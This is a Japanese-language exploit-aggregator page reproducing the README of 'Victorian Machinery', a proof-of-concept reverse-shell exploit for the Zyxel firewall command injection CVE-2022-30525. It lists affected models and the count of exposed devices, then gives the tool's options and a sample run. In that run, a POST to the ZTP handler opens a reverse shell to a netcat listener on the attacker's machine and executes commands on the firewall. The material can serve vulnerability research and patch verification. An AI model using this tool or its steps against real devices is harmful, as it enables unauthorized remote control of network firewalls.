Sploitus

Exploit for victorian_machinery

kitploit · 2026-08-31

Exploit Code

MARKDOWN103 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-JBAINES-R7-VICTORIAN_MACHINERY
# Victorian Machinery

Victorian Machinery は CVE-2022-30525 の概念実証 (PoC) エクスプロイトです。この脆弱性は、ゼロタッチプロビジョニングをサポートする Zyxel ファイアウォールに影響する、認証不要かつリモートから利用可能なコマンドインジェクション脆弱性です。Zyxel は 2022 年 4 月 28 日にこの問題の修正をリリースしました。影響を受けることが確認されているモデルは以下のとおりです:

  * USG FLEX 100, 100W, 200, 500, 700
  * ATP 100, 200, 500, 700, 800
  * USG20-VPN and USG20w-VPN



本稿執筆時点で、Shodan 上には 16,000 台以上の影響を受けるデバイスが確認されていました。管理 Web インターフェースの公開はデフォルト設定では _ありません_ 。つまり、インターネットに公開されていない影響を受けるシステムがさらに多く存在することを示唆しています。これらのシステムは自動更新もサポートしています(デフォルトでは無効)が、かなりの割合がこの問題に対してすでにパッチ適用済みです。

## PoC 動画

https://youtu.be/x8Vzq9tm47c

## オプション

Victorian Machinery は、フォークした `nc` リスナーを使って標的を攻撃し、リバースシェルを取得します。これは Ubuntu 20.04 でテストされています。この PoC はデフォルトで `/usr/bin/nc` を実行しようとします。`nc` が別の場所にある場合は、`nc-path` オプションを更新する必要があります。完全なヘルプメニューは以下のとおりです:

root@kitploit:~
    
    
    albinolobster@ubuntu:~/victorian_machinery$ python3 victorian_machinery.py --help
    
    $$\    $$\ $$\             $$\                         $$\                             
    $$ |   $$ |\__|            $$ |                        \__|                            
    $$ |   $$ |$$\  $$$$$$$\ $$$$$$\    $$$$$$\   $$$$$$\  $$\  $$$$$$\  $$$$$$$\          
    \$$\  $$  |$$ |$$  _____|\_$$  _|  $$  __$$\ $$  __$$\ $$ | \____$$\ $$  __$$\         
     \$$\$$  / $$ |$$ /        $$ |    $$ /  $$ |$$ |  \__|$$ | $$$$$$$ |$$ |  $$ |        
      \$$$  /  $$ |$$ |        $$ |$$\ $$ |  $$ |$$ |      $$ |$$  __$$ |$$ |  $$ |        
       \$  /   $$ |\$$$$$$$\   \$$$$  |\$$$$$$  |$$ |      $$ |\$$$$$$$ |$$ |  $$ |        
    $$\ \_/  $$\__| \_______|   \____$$\______$$\__|      \__| \_______|\__|  \__|        
    $$$\    $$$ |                    $$ |      \__|                                        
    $$$$\  $$$$ | $$$$$$\   $$$$$$$\ $$$$$$$\  $$\ $$$$$$$\   $$$$$$\   $$$$$$\  $$\   $$\ 
    $$\$$\$$ $$ | \____$$\ $$  _____|$$  __$$\ $$ |$$  __$$\ $$  __$$\ $$  __$$\ $$ |  $$ |
    $$ \$$$  $$ | $$$$$$$ |$$ /      $$ |  $$ |$$ |$$ |  $$ |$$$$$$$$ |$$ |  \__|$$ |  $$ |
    $$ |\$  /$$ |$$  __$$ |$$ |      $$ |  $$ |$$ |$$ |  $$ |$$   ____|$$ |      $$ |  $$ |
    $$ | \_/ $$ |\$$$$$$$ |\$$$$$$$\ $$ |  $$ |$$ |$$ |  $$ |\$$$$$$$\ $$ |      \$$$$$$$ |
    \__|     \__| \_______| \_______|\__|  \__|\__|\__|  \__| \_______|\__|       \____$$ |
                                                                                 $$\   $$ |
                                      ⚙ jbaines-r7                              \$$$$$$  |
                                     CVE-2022-30525                              \______/ 
                                           🦞                                             
    
    usage: victorian_machinery.py [-h] --rhost RHOST [--rport RPORT] --lhost LHOST [--lport LPORT] [--protocol PROTOCOL] [--nc-path NCPATH]
    
    Zyxel Firewall Command Injection (CVE-2022-30525)
    
    optional arguments:
      -h, --help           show this help message and exit
      --rhost RHOST        The remote address to exploit
      --rport RPORT        The remote port to exploit
      --lhost LHOST        The local address to connect back to
      --lport LPORT        The local port to connect back to
      --protocol PROTOCOL  The protocol handler to use
      --nc-path NCPATH     The path to nc
    
    

## 使用例

root@kitploit:~
    
    
    albinolobster@ubuntu:~/victorian_machinery$ python3 victorian_machinery.py --rhost 10.0.0.14 --lhost 10.0.0.28
    
    $$\    $$\ $$\             $$\                         $$\                             
    $$ |   $$ |\__|            $$ |                        \__|                            
    $$ |   $$ |$$\  $$$$$$$\ $$$$$$\    $$$$$$\   $$$$$$\  $$\  $$$$$$\  $$$$$$$\          
    \$$\  $$  |$$ |$$  _____|\_$$  _|  $$  __$$\ $$  __$$\ $$ | \____$$\ $$  __$$\         
     \$$\$$  / $$ |$$ /        $$ |    $$ /  $$ |$$ |  \__|$$ | $$$$$$$ |$$ |  $$ |        
      \$$$  /  $$ |$$ |        $$ |$$\ $$ |  $$ |$$ |      $$ |$$  __$$ |$$ |  $$ |        
       \$  /   $$ |\$$$$$$$\   \$$$$  |\$$$$$$  |$$ |      $$ |\$$$$$$$ |$$ |  $$ |        
    $$\ \_/  $$\__| \_______|   \____$$\______$$\__|      \__| \_______|\__|  \__|        
    $$$\    $$$ |                    $$ |      \__|                                        
    $$$$\  $$$$ | $$$$$$\   $$$$$$$\ $$$$$$$\  $$\ $$$$$$$\   $$$$$$\   $$$$$$\  $$\   $$\ 
    $$\$$\$$ $$ | \____$$\ $$  _____|$$  __$$\ $$ |$$  __$$\ $$  __$$\ $$  __$$\ $$ |  $$ |
    $$ \$$$  $$ | $$$$$$$ |$$ /      $$ |  $$ |$$ |$$ |  $$ |$$$$$$$$ |$$ |  \__|$$ |  $$ |
    $$ |\$  /$$ |$$  __$$ |$$ |      $$ |  $$ |$$ |$$ |  $$ |$$   ____|$$ |      $$ |  $$ |
    $$ | \_/ $$ |\$$$$$$$ |\$$$$$$$\ $$ |  $$ |$$ |$$ |  $$ |\$$$$$$$\ $$ |      \$$$$$$$ |
    \__|     \__| \_______| \_______|\__|  \__|\__|\__|  \__| \_______|\__|       \____$$ |
                                                                                 $$\   $$ |
                                      ⚙ jbaines-r7                              \$$$$$$  |
                                     CVE-2022-30525                              \______/ 
                                           🦞                                             
    
    [+] Executing netcat listener
    [+] Using /usr/bin/nc
    Listening on 0.0.0.0 1270
    [+] Sending a POST request to https://10.0.0.14:443/ztp/cgi-bin/handler
    Connection received on 10.0.0.14 43957
    bash: cannot set terminal process group (10800): Inappropriate ioctl for device
    bash: no job control in this shell
    bash-5.1$ id
    id
    uid=99(nobody) gid=10003(shadowr) groups=99,10003(shadowr)
    

## クレジット

  * Red Hot Chili Peppers